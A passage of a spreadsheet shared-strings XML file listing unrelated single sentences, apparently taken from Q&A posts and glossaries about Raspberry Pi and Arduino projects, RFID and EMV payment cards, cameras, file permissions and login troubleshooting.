either that user must be owner of mounted folder and its contents, and have the "user" permissions, or
the the folder must be accessible to the group the webserver user is in (usually www-data).</t>
  </si>
  <si>
    <t>However, chip manufacturers sometimes also use the term "contactless smartcard" for contactless memory cards that have additional cryptographic and/or access control logic.</t>
  </si>
  <si>
    <t>Mojibake is the phenomenon which occurs when text is decoded from a byte stream using the wrong character encoding, resulting in a sequence of characters which is unreadable.</t>
  </si>
  <si>
    <t>Apple Pay JS is a JavaScript SDK available for Safari in iOS 10 and macOS Sierra for accepting Apple Pay payments on the web.</t>
  </si>
  <si>
    <t>EMV stands for Europay, MasterCard and VISA, a global standard for inter-operation of integrated circuit cards (ICC or "chip cards") and ICC capable point of sale (POS) terminals and automated teller machines (ATMs), for authenticating credit and debit card transactions.</t>
  </si>
  <si>
    <t>The goal is when I leave home - more specifically, when my phone leaves home - my IP camera's motion detection is armed.</t>
  </si>
  <si>
    <t>I am 100% sure that I entered the correct username and password.</t>
  </si>
  <si>
    <t>Using the ProMicro 5v and a "Case Logic 2.0 USB Hub" and the Camera kit I was able to get the programed keyboard commands to be recognized by the iPad without modifying "USBDesc.h" file.</t>
  </si>
  <si>
    <t>Receipt few characters, the output is this:
==&gt; "Numero de accesos: 77 | Identifica"
But, realy, the output should be:
Numero de accesos: 77 | Identificador: 4l02pnl828o3kctg4strc87ed1
Exactly like: HTTPREAD missing characters with Arduino and SIM900
Any ideas or help?</t>
  </si>
  <si>
    <t>I have used chmod to change the permissions of the folder that i have got my images and script in to chmod -R 777.</t>
  </si>
  <si>
    <t>Initially I thought it's a permission issue so I change the permission of executable using chmod 777.</t>
  </si>
  <si>
    <t>For example, after I type login and then press enter, there is a sentence saying type your password.</t>
  </si>
  <si>
    <t>I have recently used OpenCV to do face recognition with the raspi.</t>
  </si>
  <si>
    <t>a quick summary of the problem I'm facing: 
I am trying to connect via SSH to my raspberry pi, and then run a docker image on the raspberry pi.</t>
  </si>
  <si>
    <t>Samsung Pay is a mobile payment and digital wallet service by Samsung Electronics that lets users make payments using compatible phones and other Samsung-produced devices.</t>
  </si>
  <si>
    <t>I am using Raspberry Pi (Debian 3.1.9+ armv6l linux) and javaSE 7 and I am trying to change my trustore password by keytool but keytool command is not working So can you please tell me how can i change my trustore password in this environment.</t>
  </si>
  <si>
    <t>No any kind of permission works in my situation:
Pressing the button doesn't product any output, no change at all.</t>
  </si>
  <si>
    <t>After the third RFID identification I always get a DebugMessage like this
And the button and RFID reader dont work anymore.</t>
  </si>
  <si>
    <t>Changing the value of addressAval to 00000000 also evaluates (correctly) to 16843008, and changing addressAval to 00000010 also correctly evaluates to 16843010.</t>
  </si>
  <si>
    <t>If you are experienced in soldering you could "hardware-hack" the pi as the second I2C bus lies on the camera interface.</t>
  </si>
  <si>
    <t>Specifying the document's character encoding
There are several ways to specify which character encoding is used in the document.</t>
  </si>
  <si>
    <t>SHA-1 is very similar to SHA-0, but corrects an error in the original SHA hash specification that led to significant weaknesses.</t>
  </si>
  <si>
    <t>If I understand correctly that your problem is: "How to use one SPI master device connected to 3 slave devices", here is the solution:
Connect your master SCK to all 3 slave devices SCKs
Connect your master MOSI to each slave's MOSI
Connect each slave's MISO to your single master MISO
Use general IO (output of course) signals as SS (SlaveSelect) to enable/disable communication with the particular slave device.</t>
  </si>
  <si>
    <t>Even though you have not provided the detailed steps about how to generate the x509 certificate for the device, i encountered the similar issue long time ago.Please try to change the Common Name(CN) as the device name that created in Azure Portal(IoTHub-&gt;IoT Devices).</t>
  </si>
  <si>
    <t>Whether a merchant enters into a merchant agreement directly with an acquiring bank or through an aggregator such as PayPal, the agreement contractually binds the merchant to obey the operating regulations established by the card associations.</t>
  </si>
  <si>
    <t>SIM cards used in mobile phones are also smart cards, proving an existing account towards network and storing phone numbers and text messages.</t>
  </si>
  <si>
    <t>If I turn my phone's blue tooth on and issue the following command, I get the following output (before anyone starts preaching to me about how this is a breach of security, let me remind you that that is not my actual phone bluetooth id):
command:
output:
Now if I turn my phone's bluetooth off, and issue the same command, I get the following output (again, all id's have been changed to protect the innocent).</t>
  </si>
  <si>
    <t>So far I've got the crontab to automatically run the script  via @reboot sleep 30 &amp;&amp; sudo bash ./checkssh.sh and './checkssh.sh' contains this:
Running checkssh.sh from an SSH terminal returns 'SSH CONNECTED' which is expected, and letting it run automatically from the crontab at reboot when SSH isn't connected works correctly.</t>
  </si>
  <si>
    <t>https://unix.stackexchange.com/questions/427345/keyboard-monitoring-without-display
I modified his solution a bit so that I can exit from listening when escape key is pressed.</t>
  </si>
  <si>
    <t>This file is often maintained with the shell command  which can add, delete, and update users, and will properly encode the passwords for use (so they are easily checked, but cannot be reversed back to the original password).</t>
  </si>
  <si>
    <t>Because it is still relative time intensive to input a username/password i like to use a fingerprint scanner on the terminal.</t>
  </si>
  <si>
    <t>I have a barcode scanner that will be recognized as a keyboard by Windows (IoT) and I like to write a  that fires an event if a new barcode was scanned.</t>
  </si>
  <si>
    <t>I thought that the issue might have to do with the permissions/ownership of the sound file and tinkered around with those, but that didnt help (Im also pasting below information about the ownership and permission of the script itself, and the sound file).</t>
  </si>
  <si>
    <t>After that I was left with another problem: PuTTY Fatal Error: Disconnected: No supported authentication methods available, and after Googleing the problem for a good hour or so, I found out that Pageant had apparently no private key in the Pageant key list.</t>
  </si>
  <si>
    <t>I have seen (Mono 3.0, Ubuntu 12.10, Nginx and ServiceStack) issue and have changed permissions on the Socket file but I still get the same issue.</t>
  </si>
  <si>
    <t>Preamble:
I suppose that you alredy have the code that can recognize the barcode from the webcam and also is able to recognize the number of barcode in the image and select the barcode one by one.</t>
  </si>
  <si>
    <t>You may try to use App Specific Hardware ID as described here: 
https://msdn.microsoft.com/en-us/jj553431
Basically, you will not get a device Id that is unique to the device itself, only an ID which makes that ID unique for your app that is running on that device.</t>
  </si>
  <si>
    <t>I want to be able to send those files to a computer on the same network automatically without having to ssh in using PUTTY, Filezilla, etc... 
Any suggestions on how to do this?</t>
  </si>
  <si>
    <t>This unlock is normally obtained by pressing a button and/or swiping a finger across the screen.</t>
  </si>
  <si>
    <t>Mastercard provides a payment interface that can be used to programmatically handle payments via credit card.</t>
  </si>
  <si>
    <t>Including photographs, videos, face detection and barcode scanning</t>
  </si>
  <si>
    <t>uint8_t macSlaves[][6] = {{0x24, 0x0a, 0xc4, 0x1c, 0x77, 0x44}};
int slavesCount = sizeof(macSlaves)/6/sizeof(uint8_t);
  for(int i=0; i&lt;slavesCount; i++){
    slave.channel = CHANNEL;
    slave.encrypt = 0;
    memcpy(slave.peer_addr, macSlaves[i], sizeof(macSlaves[i]));
    esp_now_add_peer(&amp;slave);
  }
So I truly don't know what I am doing wrong or how the adding a peer during setup and later during a call are considered different.</t>
  </si>
  <si>
    <t>Clinux has support for many architectures, and forms the basis of many products, like network routers, security cameras, DVD or MP3 players, VoIP phone or Gateways, scanners, and card readers.</t>
  </si>
  <si>
    <t>Basically you would do something like the following:
SELECT PPSE
Find AID of payment application in select response
SELECT payment application (by AID)
READ RECORD (file + record number) for the record that contains the PAN/ICC public key
You would need some contactless smartcard reader to send the necessary APDU commands though.</t>
  </si>
  <si>
    <t>I use the following arduino mega shield 
http://pcb.daince.net/doku.php?id=data_logger
and a "Kingston MicroSDHC 4GB Secure Digital Card, 66X" for storage
I ran the the following code for 3 days and when I came back the SPI was none responding (I have done 1 hours tests before with no problem, and I have checked that the system changes files correctly)
I know that this is a big code dump and I'm sorry for that, but I carnt realy cut it down when I have no idea what is killing my SD cards.</t>
  </si>
  <si>
    <t>I've made a simple pygame application to access my local machine camera as follows :
I've been looking around for way for me to access my Raspberry Pi camera feed which is located in my Local Network, what I was hopping to be possible is not changing much of my current code and only change the line :
 where it find the RPi camera on the network instead of my local machine by adding the RPi IP and login information, However I'm starting to realize that this maybe not possible the way I want it, but if there is a similar way that doesn't deal with VLC player or any other GUI application would be fine for me because I intend to use as little as possible of the RPi memory and processor, is there a way close to what I'm hopping for?</t>
  </si>
  <si>
    <t>example:
key in password "1234" to active button 1,
key in password "1235" to active button 2,
key in password "1236" to active button 3.
here is the code:-</t>
  </si>
  <si>
    <t>I had the same problem, and found my Gateway IP address was wrong after entering the correct IP my code works fine.</t>
  </si>
  <si>
    <t>They simply send out advertisements at a fixed rate with a unique identifier.</t>
  </si>
  <si>
    <t>Most users, however, are familiar with passwords and pass-phrases and
  feel more comfortable entering them than entering keys.</t>
  </si>
  <si>
    <t>Point of Sale (POS) terminals that are often used to accept credit card payment.</t>
  </si>
  <si>
    <t>Mask literals, or characters that should appear directly in the
MaskedTextBox; for example, the hyphens (-) in a phone number, or the
currency symbol in a price.</t>
  </si>
  <si>
    <t>PAYMILL offer all major Credit and Debit Card brands like Visa, Mastercard, AMEX, JCB, CuP, Diners, Discover etc.</t>
  </si>
  <si>
    <t>The fact that the firewall is activated does not mean, however, that the HTTP authentication username and password box is displayed for every URL.</t>
  </si>
  <si>
    <t>Besides that, smartcard readers may also support other protocols for communication with chip cards and contactless tokens.</t>
  </si>
  <si>
    <t xml:space="preserve">
Long ago it was considered safe to have encrypted passwords openly visible in the password file.</t>
  </si>
  <si>
    <t>There are a lot of different appliances:
character-encoding which has been used to transform between characters and bytes.</t>
  </si>
  <si>
    <t>The terminal resembles the state which is normally found when entering a password where the typed character cannot be seen.</t>
  </si>
  <si>
    <t>The app uses facial detection as a first step filter for reaching facial recognition.</t>
  </si>
  <si>
    <t>The problem is that it gets stuck on the login screen, waiting for me to press 'ok' (i removed the password).</t>
  </si>
  <si>
    <t>What you could try to do is to access the EMV payment card ("tokenized" credit card) on the secure element.</t>
  </si>
  <si>
    <t>The phone SD card
You can access files on your phone's SD (secure digital) card using file names that begin with /sdcard .</t>
  </si>
  <si>
    <t>Sure, the original python might be hidden, but from the assembly, a somewhat skilled person can easily gather what is happening.</t>
  </si>
  <si>
    <t>It is not intended to provide functionality that might be required by a more "serious" image application - such as face recognition or movement tracking.</t>
  </si>
  <si>
    <t>The webpage suggests declaring a character encoding at the beginning of the script, but it didn't work for me, and in any case, I would rather not have to have it at the beginning of every script - I just want the keyboard to produce the correct character to begin with.</t>
  </si>
  <si>
    <t>Second suggestion - changing the way the incoming chars are read
If you are unable to change the structure of the login.txt file, and can only read it from an SD card, try this code in order to read from a file (modified version of the one in the first suggestion):
Please note that both suggestions will not store the lines into separate variables.</t>
  </si>
  <si>
    <t>My code is:
When I run this code it shows "correct ssid and enter ur password" again and again.</t>
  </si>
  <si>
    <t>But now what I'm trying to do is to have a 2nd code that will close the garage door &amp; unlock the door as well [I have a pin attached to a relay that activates a button on the garage door remote] everything individual works but I cant figure out how to have both of the codes in there (I have the second code labeled mum because she will be the one using it)
If anyone can help me figure out how to have both run simutaniously that would be great, Thanks.</t>
  </si>
  <si>
    <t>My problem is that the written file is always corrupt, when I open the corrupt file with notepad++ I can see that there are general different "symbols" compared with a playable one.</t>
  </si>
  <si>
    <t>I am try to get face detection working on using a python script and OpenCV but I keep getting this error:
The code I used is here: https://github.com/mitchtech/py_servo_facetracker
I don know what is causing this error or how to fix it.</t>
  </si>
  <si>
    <t>My biggest fear being, am I wasting time kicking a dead horse or should I just look for some other algorithm to detect a change in image or should I use edge detection</t>
  </si>
  <si>
    <t>The problem with accessing an API without verifying the fingerprint is that someone can fake the server, but I expect that to not be an issue in most use cases.</t>
  </si>
  <si>
    <t>In the mean time I realized that a fast arming could be done via the Pi Face and pressing a button.</t>
  </si>
  <si>
    <t>Instead, the entire command is entered in the username field (the -n flag prompts a new line but its just treated as a carriage return, and not like hitting 'Enter' on the keyboard).</t>
  </si>
  <si>
    <t>So I currently have some code that I found that basically just emulates a keyboard and types in 0000 ENTER, 0001 ENTER, all the way to 9999.</t>
  </si>
  <si>
    <t>Simply do the following:
Don't enter a passphrase and leave everything default when running ssh-keygen.</t>
  </si>
  <si>
    <t>I want to make a system which would get input from USB barcode scanner, validate it on remote server and display an answer (text and images).</t>
  </si>
  <si>
    <t>Then I press enter, type login, press enter, type password, press enter, type 'ip show' and then retrieve the ip adress.</t>
  </si>
  <si>
    <t>The card verification value (CV2) is a very important security feature that is made for credit card transactions on the Internet and over the phone.</t>
  </si>
  <si>
    <t>Main task is to transmit an jpg image taken by a jpeg serial camera at the transmitter and send it to a microSD memory at the receiver, but I've been dealing with one unique trouble, I need a delay of 2 seconds to send and receive succesfully 1 byte, if I set less seconds I lose information and receipt image get corrupted.</t>
  </si>
  <si>
    <t>It seemed that udev wasn't mapping the device to /dev/video*, and when I re-plugged in the webcam and checked it's status with "dmesg | tail", I received an error: 
After researching the problem and coming to the conclusion that it was filesystem corruption, I attempted to run a filesystem check on the SD media.</t>
  </si>
  <si>
    <t>options change on the server, one of two things usually happen:
A) You send a tiny "ping" (in the general sense, not the ICMP host detection protocol) to the device alerting it that config options have changed.</t>
  </si>
  <si>
    <t>Smaller/Easier/Cheaper, needs less hardware on the TAG, might even need a separate antenna for sending
Harder to snoop communication as the modulation is harder to detect from distance
tl;dr
A bare ardouino doesn't have the required hardware onboard to modulate the reader's RF field.</t>
  </si>
  <si>
    <t>Authorize.Net is a payment gateway service provider allowing merchants to accept credit card and electronic checks payments through their Web site and over an IP (Internet Protocol) connection.</t>
  </si>
  <si>
    <t>My problem is that i want to create a script on my rpi to automatically change wifi networks and change eth0 between static and dhcp.</t>
  </si>
  <si>
    <t>when i enter the page there is a popup asking for username and password:
Now i need my app to somehow enter the username and password automaticly every time i oppen the app.</t>
  </si>
  <si>
    <t>Change the lock image on the android phone
4. send "1" from the android phone to the arduino
5.</t>
  </si>
  <si>
    <t>I know for a fact that the www-data user has the right privileges to the disk since I've overcome permission issues before as well as the correct mysql credentials.</t>
  </si>
  <si>
    <t>The signature for your function is getenviroment(self,radio), so radio will be assigned to self and dt will be assigned to radio.</t>
  </si>
  <si>
    <t>Regardless, of how some of the renowned programmers advocate hacking in a positive sense, in the media the word still depicts the character of a cunning thief.</t>
  </si>
  <si>
    <t>c:\Program Files (x86)\Atmel\Flip 3.4.7\bin&gt;batchisp.exe -device AT32UC3A1256 -hardware usb -operation erase f memory flash blankcheck loadbuffer c:\Arduino\hardware\arduino\firmwares\wifishield\binary\wifiHD.elf program verify start reset 0
"
Press Enter 
Here is what will happen on your screen..
Running batchisp 1.2.5 on Sat May 10 21:34:04 2014
AT32UC3A1256 - USB - USB/DFU
Device selection.......................</t>
  </si>
  <si>
    <t>The purpose of password recovery might be to help a user recover a forgotten password (though installing an entirely new password is less of a security risk, but involves system administration privileges), to gain unauthorized access to a system, or as a preventive measure by system administrators to check for easily recoverable passwords.</t>
  </si>
  <si>
    <t>I changed out appkey.c for my appkey as given by spotify but when I run the spshell example and try to login, I get an error
I'm sure that I'm using the correct username (I also tried email) and password (I also tried changing the password) and I've tried the jukebox example as well and get a similar error.</t>
  </si>
  <si>
    <t>well, 
1 - i've reinstalled Bonjour
2- opened the port 5353 UDP in the firewall of windows 7
3 - reinstalled ide arduino
4 - upgraded the OpenWrt-Yun image on the Yn here
it isn't still working... any suggestion for me???</t>
  </si>
  <si>
    <t>This is the error I'm getting in /var/log/mysql/error.log:
It could also be permission issues, or maybe files are still locked (I don't know how that works), because the last time the Raspberry Pi restarted, it was because someone accidentally pulled out the power plug of the Pi.</t>
  </si>
  <si>
    <t>I saw some privileges issues related to the repository or file but I did change the privilege with chmod 777 to be sure it wasn't that and it didn't change my problem.</t>
  </si>
  <si>
    <t>If you've just installed MariaDB, and
you haven't set the root password yet, the password will be blank,
so you should just press enter here.</t>
  </si>
  <si>
    <t>Enter current password for root (enter for none):
OK, successfully used password, moving on...</t>
  </si>
  <si>
    <t>I need the bluetooth name on Pi to change to the current IP of the PI so i can ssh into it because Im constantly changing WIFI and my IP Address always changes.</t>
  </si>
  <si>
    <t>All I did was (almost blindly) editing the culprit file with the 
and entering some characters in order to actually corrupt such file, saving and closing it, a rebooting the Pi.</t>
  </si>
  <si>
    <t>I've tried to fix your problem, found solution for your issue, but problem with authenticating still occurs.</t>
  </si>
  <si>
    <t>I have no idea if the issue was with the previous windows installation being corrupt or if the update fixed something.</t>
  </si>
  <si>
    <t>I forgot to mark this question as solved, My problem was that my university does not allow us(Students) to download from risky pages(they call them fake websites).</t>
  </si>
  <si>
    <t>Sql-escaping, is a technique use to prevent SQL injection by escaping meaningful special characters in SQL.</t>
  </si>
  <si>
    <t>Keytest is reading the key right and shows it as keycode_a (for example) when an A is sent, but the scancode for that key is always 0 instead of a unique identifier.</t>
  </si>
  <si>
    <t>The credentials were being saved correctly and cards were populating a timeline correctly, but all against my son's Google account and he has no Glass!</t>
  </si>
  <si>
    <t>It also makes sure that only the person who knows a person's user-name and password can get into their account and change things that they have access to.</t>
  </si>
  <si>
    <t>I'm thinking of a method when you select a network and enter the password and press connect it adjusts the '/etc/network/interfaces' file and restarts the wlan0 interface (it doens't need to be really secure).</t>
  </si>
  <si>
    <t>In my case would be facial recognition and I would want to send the recognized face to visual studio in windows so that it is able to update the database but I have no idea how to start.</t>
  </si>
  <si>
    <t>please correct me if my guess is wrong based on my limited security knowledge</t>
  </si>
  <si>
    <t>In other words, the user doesn't have to enter credentials to ssh into the Pi but rather have the program automatically do so.</t>
  </si>
  <si>
    <t>i create ethereum private network on window and raspi to mininig and run node but i get some problem
raspi stuck in unlocked account process
first problem raspi stuck in unlocked account process when i run Geth file to mining and generate dag (i try to use pc window and it can generate DAG success [in picture2])
window10
second problem 
i cant generate dag and always have Error Code
"Failed to generate mapped ethash dataset epoch=0 err="cannot allocate memory"
runtime: out of memory: cannot allocate 2147483648-byte block (128679936 in use)"
i dont know raspi's RAM or sd card is not enough
i use raspberry pi 3 model B 
thank you very much</t>
  </si>
  <si>
    <t>I managed to disable the screen standby but now I encountered another problem: after few minutes the raspberry disconnects me and shows the login prompt.</t>
  </si>
  <si>
    <t>On application startup in the main method we use code similar to this in order to make sure that keyboard and barcode scanners get distinguished.</t>
  </si>
  <si>
    <t>The lesson already learned, we conclude:
avoid an initial password with percent
if you already made it, at the login use the password ignoring the percent
a Pandora's box is hidden there.</t>
  </si>
  <si>
    <t>Every year Sage Pay processes billions of pounds worth of secure payments for its 50,000+ customers and makes the process of accepting payments online, over the phone, or in person simpler, faster, safer and more profitable for businesses.</t>
  </si>
  <si>
    <t>It seems to be very speratic, with lots of blanks lines and various odd entries that look to be from the terminal (ssh login field prompt).</t>
  </si>
  <si>
    <t>I have no problem when it's just one reader but I can't figure out what's wrong with the authentication part when I add a second NFC reader.</t>
  </si>
  <si>
    <t>On the original post, it was also suggested I try something like:
echo &lt;password&gt; | sudo -S date --set="20130829 02:02
While it's probably not a good idea to put in my root password like that, I tried it and got the same result: it works when doing in the terminal/shell and within the python interpreter, but not via the web ui to python.</t>
  </si>
  <si>
    <t>Though the core problem is incorrect credentials, the reason for incorrect credentials may be one of the below: 
The user id may not be present in the target system 
$ORACLE_SID maybe incorrectly defined, leading to a connection attempt to a wrong system
tnanames.ora points to an incorrect instance
Also, if you upgraded a pre-Oracle 11g instance to Oracle 11g &amp; above, you might start encountering ORA-0107 messages.</t>
  </si>
  <si>
    <t>I changed in setting under sudo nano /etc/default/keyboard
XKBLAYOUT="in"
I know i made some mistakes here "in" is not any standard but after rebooting my system am unable to login in my device
 please help me out..</t>
  </si>
  <si>
    <t>This includes issues like representing cards and decks in data structures, user interfaces for manipulating cards in a virtual fashion, implementing correct algorithmic shuffling, and using cryptographically secure protocols to exchange cards over a network.</t>
  </si>
  <si>
    <t>Here detection is not much of a problem(lot of tutorials available, I can manage that but any tips would be appreciated), taking action upon the detection is.</t>
  </si>
  <si>
    <t>I know that a user on a phone would enter the username and password in order to get a token which is valid for a certain period of time.</t>
  </si>
  <si>
    <t>The fact that it isn't showing proper Device ID and offsets just makes the data I collect messed up and useless.</t>
  </si>
  <si>
    <t>Here is the most relevant section of the Python code:
Here is the Arduino code:
My hope is that the variable lockVer would change from 0 to 1, and this change would be identified by the Arduino, causing the linear servo to activate and move into the unlock position, wait 5 seconds, and move back to the locked position.</t>
  </si>
  <si>
    <t>Though the polling example looks as if it could potentially detect a phone's passive peer-to-peer mode (when display is on and device is unlocked) as either "Mifare" ISO 14443-3 or "FeliCa" due to the fact that those modulation and protocol activation schemes are used in peer-to-peer mode too.</t>
  </si>
  <si>
    <t>There were two separate problems:
The SD card image was corrupted; the green ACT light had not been blinking.</t>
  </si>
  <si>
    <t>Thieves can use cameras, themselves, or even other people to view the pattern that a 4 digit pin makes when entered; therefore they do not need to know the actual value of your pin, just the sequence of button presses that will allow for entry into the system.</t>
  </si>
  <si>
    <t>After scanning the print, I fill out a form, and hit a submit button which takes the fingerprint id that was created by the fingerprint scanner and links it with one of the fields in the form (behind the scenes).</t>
  </si>
  <si>
    <t>Stripe Checkout: A drop-in, smart payments page to start accepting payments in minutes.</t>
  </si>
  <si>
    <t>After several trials, what I have achieved so far, is to leave the login screen, but ... something curious happens: Login does not work if a micro SD card is inserted.</t>
  </si>
  <si>
    <t>I'm trying to use the PN532 by Elechouse V3 connected through i2c to the raspberry-pi to read debit and credit card and I manage to read the type-A card successfully.</t>
  </si>
  <si>
    <t>Thanks :)
Main part of the code: (I hope the subroutines I haven't included are pretty self-explanatory)
Keyboard file //////////
insert 22 NOP lines here
SBIC PINE, 6
RJMP return_key_val
INC R18
CPI R18, 12
BRNE scan_key
LDI R18, NO_KEY     ; no key was pressed!</t>
  </si>
  <si>
    <t>Everything was working until a couple days ago when, without hardware modification and without any (apparent) code modifications, the SD card no longer is detected.</t>
  </si>
  <si>
    <t>Your problem is this line:
Every client needs a unique client id, hard coding it to  means that when the second client connects the broker will kick the first one off, which will then try and reconnect which will kick the second off.</t>
  </si>
  <si>
    <t>org.owasp.csrfguard.unprotected.publisherApi=%servletContext%/publisher/api
edit the above as follows,
org.owasp.csrfguard.unprotected.publisherApi=%servletContext%/publisher/api/*
I can see that this issue has been fixed in the latest code.</t>
  </si>
  <si>
    <t>A GUID (Globally Unique IDentifier) is a unique reference number used as an identifier in computer software.</t>
  </si>
  <si>
    <t>A common example of brute force is password enumeration, where a large number of passwords are used against a protected resource in the hope that one is correct.</t>
  </si>
  <si>
    <t>Sage Pay is the UKIs leading independent payment service provider (PSP) and is one of the most trusted payment brands.</t>
  </si>
  <si>
    <t>Go to terminal and type lsusb and check whether the USB camera is recognized or not.</t>
  </si>
  <si>
    <t>I tried deleting all SD contents, and flash latest Android Things image, and I realized SD card is corrupt.</t>
  </si>
  <si>
    <t>However the video that is display has become corrupted:
Corrupted Video Output
I have isolated the problem to the Gstreamer pipeline by streaming to a different port on the Pi and saving the stream to .mp4, however this video does not play.</t>
  </si>
  <si>
    <t>I am trying to run a home security camera using Rasberry Pi Model B 
I want to save the stream to a file locally (USB if possible) and also stream so I can pick this up on my network
The command I have is not working for both - any suggestions?</t>
  </si>
  <si>
    <t>hence issue is some missing/incorrect config in mosquitto due to which IoT platform doesn't like certs used to connect with mosquitto?</t>
  </si>
  <si>
    <t>So if I save the password into the SPIFF, how would I access the Wemos D1 mini if the password changes and I needed to update the password on the Wemos D1 mini to reflect that password change?</t>
  </si>
  <si>
    <t>I would guess Mono on the ARMV6 Hard-float architecture of RasPi, probably is having trouble in handling the intentional SIGILL issued by the feature detection code in Yepp (https://bitbucket.org/MDukhan/yeppp/src/40148ba4cdd00b03dfa880f6b7cecce83979c9d3/library/sources/library/Probe.arm.asm?at=default) and may be collapsing.</t>
  </si>
  <si>
    <t>In order to simulate a contactless credit card terminal to the iPhone (with Apple Pay), you would need to speak the EMV protocol (get the specifications from EMVCo).</t>
  </si>
  <si>
    <t>I've never tried this without a username and password, so if it doesn't work with blank configurations, I'd consider setting up a username and password if you want to bypass this page.</t>
  </si>
  <si>
    <t>I'm unsure as to exactly what is going wrong, but I guess that it is because it does not have permissions to write the file to disk because I see the red camera light turn on and then nothing.</t>
  </si>
  <si>
    <t>Unfortunately the issue persists despite changing permissions using 'chmod 777'.</t>
  </si>
  <si>
    <t>We need Android Google Play Services SDK level 25 or greater( Google Play services 7.8)
Note: Face Detection is a leap forward from the previous Android FaceDetector.Face API
Fore more info Face Detection in Google Play services</t>
  </si>
  <si>
    <t>The types of vehicles and assets tracked include taxis, delivery vans, trucks/trailers, farm equipment, personal vehicles, service vehicles, containers, ships, ATVs, personal tracking, cell phones, and more.</t>
  </si>
  <si>
    <t>But, we're currently encountering a problem, after enabling Personal Hotspot from iOS, the camera either :
does not "see" the WiFi Network, so it can't connect to it 
when the network is visible, it does not connect to the Personal Hotspot : it
keeps trying to negotiate keys, and authenticating without success
When this problem occurs, we also tried to connect a Windows 7 laptop and a MacBookPro (running latest Sierra), but the WiFi connexion to iOS' Personal Hotspot could not been established either, with similar behaviors (wifi visibility, impossible to authenticate, connexion stabiliy...).</t>
  </si>
  <si>
    <t>If you wish to pay via online banking, there is no need for you to log into the service; you can make payments directly by clicking on your banks logo at the payment selection page.</t>
  </si>
  <si>
    <t>When I use chmod to change the permissions of a .py file so that I can execute it, and add -v at the end:   "chmod a+x test.py -v "           the changed permissions are displayed as changed  " rwxr-xr-x "
then when I enter " ls -l ", the permissions are as they were before I used chmod.
"</t>
  </si>
  <si>
    <t>The default login should be:
user: 
password: raspberry
It's probably a good idea to change the password for security reasons...</t>
  </si>
  <si>
    <t>Assuming your index.html is in the same directory as the image, use a relative URL to refer to the image:
&lt;img src="forwardbutton.png" id="t" onmousedown="forward()"&gt;
To check if permissions are set up correctly, you can open the image directly in your browser.</t>
  </si>
  <si>
    <t>What I want to do is have 5 colored buttons hooked up on a breadboard and into the Arduino, then when the buttons are pressed in a certain combination, it will trigger a servo to unlock a box or something.</t>
  </si>
  <si>
    <t>I have made an opencv security system that will send a text msg + image of what triggered the alarm to my smart phone.</t>
  </si>
  <si>
    <t>I can view the image on the rpi when I open it, but once it is sent to the android, something is happening to it that causes the incorrect number of bytes to be read and the image to be corrupted.</t>
  </si>
  <si>
    <t>The solution was to stop the monitoring command when a user swiped their card then resume monitoring after the 5 seconds of the door being unlocked.</t>
  </si>
  <si>
    <t>And then on following page 166:
Here, the following assumptions apply:
A pass-phrase is a sequence of between 8 and 63 ASCII-encoded    characters.</t>
  </si>
  <si>
    <t>This screen contains the 4-digit code you need to pair the device to the companion app (highlighted in red):
If you tap SKIP, there is not currently a way to get back to display the pairing code without doing a factory reset or flashing the image again.</t>
  </si>
  <si>
    <t>Classically refers to credit card transactions, but nowadays the term describes also internet payment methods like Paypal.</t>
  </si>
  <si>
    <t>Your payment credentials, coupons/offers, and loyalty cards can then be easily accessed from any device or purchase flow that supports Android Pay.</t>
  </si>
  <si>
    <t>It's the application structure inside your smart card that handles requests for protected data and communicates with the issuing bank to confirm the authenticity of the card user.</t>
  </si>
  <si>
    <t>Part of the MIFARE range is MIFARE Classic, a product family of contactless smart card ICs used in public transport, access management, loyalty cards and many more.</t>
  </si>
  <si>
    <t>One thing is sure: The rainbow screen means the GPU firmware is loaded, but there is a problem with the kernel image.</t>
  </si>
  <si>
    <t>Problem apparently made it all the way through the insider builds into production.</t>
  </si>
  <si>
    <t>From Ubuntus wiki on RaspberryPi,
Login username is "ubuntu", password is "ubuntu"
on the prompt "ubuntu login:" you should type in ubuntu and hit enter.</t>
  </si>
  <si>
    <t>You wont be able to close and reopen the app as fast (it will relaunch every time you use the home button), but if you don't interact with the iPad very often, then you can just lock the device while the app is open and it will continue to run until the iPad is unlocked or you open another app.</t>
  </si>
  <si>
    <t>I see the BT device on my phone, write the password 1234, on my phone it says "Paired", but the indicator keeps flashing and nothing else happens (I'm trying to turn a led on pin 13 with ArduDroid).</t>
  </si>
  <si>
    <t>I'm running a UWP app in assigned access mode, and I'm noticing that, despite changing the power settings so that the screen saver never comes on, quite often the generic Windows 10 login screen will appear, when the app should always be running.</t>
  </si>
  <si>
    <t>It is open hardware (as much as possible... because ARM-manufacturers protect their chips with patents) cheap, and the community do lots of projects.</t>
  </si>
  <si>
    <t>After introducing the password, and waiting for the policy privacy agreement screen, and finally pressing I agree, it can take a couple of minutes until the control is returned to the activity that started the process.</t>
  </si>
  <si>
    <t>But many times the SD-card get corrupted or big files get removed from the card while renaming the file.</t>
  </si>
  <si>
    <t>Encoding credentials still is still a good thing, but encoded string can always be decoded, if your code can, somebody with access to it can too.</t>
  </si>
  <si>
    <t>https://www.raspberrypi.org/documentation/installation/sd-cards.md
If you are having trouble with corruption of your SD cards, make sure you follow these steps:
Make sure you are using a genuine SD card.</t>
  </si>
  <si>
    <t>Mozilla's Open Badges make it easy for anyone to issue, earn and display badges across the web through a shared infrastructure that's free and open to all.</t>
  </si>
  <si>
    <t>Should I use face recognition or RFID cards?</t>
  </si>
  <si>
    <t>I'm designing a rfid system where a rfid cart unlocks a door.</t>
  </si>
  <si>
    <t>The code is about face detection in C++ using the raspberry pi 2 and the camera module.</t>
  </si>
  <si>
    <t>Once I login a second screen appears with buttons and an image.</t>
  </si>
  <si>
    <t>The difficulty here is the fact that I need some sort of certificate to be allowed to connect, and I'm not sure what I need to do this.</t>
  </si>
  <si>
    <t>If the problem is indeed with the permissions - this should solve your problem.</t>
  </si>
  <si>
    <t>L. Kolar 
My issue was a corrupted SD Card.</t>
  </si>
  <si>
    <t>external GPS hardware, barcode scanners, etc.</t>
  </si>
  <si>
    <t>I have followed many tutorials on the internet and specifically this link
https://www.youtube.com/watch?v=ozo_npQMQS8
now the problem is that while installing mysql i dont get any window in the command line asking for the password hence i am not able to set the root password..</t>
  </si>
  <si>
    <t>When setting up a new device using IoT Dashboard, the password entered for Administrator is not properly saved on the image.</t>
  </si>
  <si>
    <t>if you write index.html in /var/www/html folder without having permission issue you should change the permission or ownership 
also make sure 
And restart the server 
systemctl restart lighttpd</t>
  </si>
  <si>
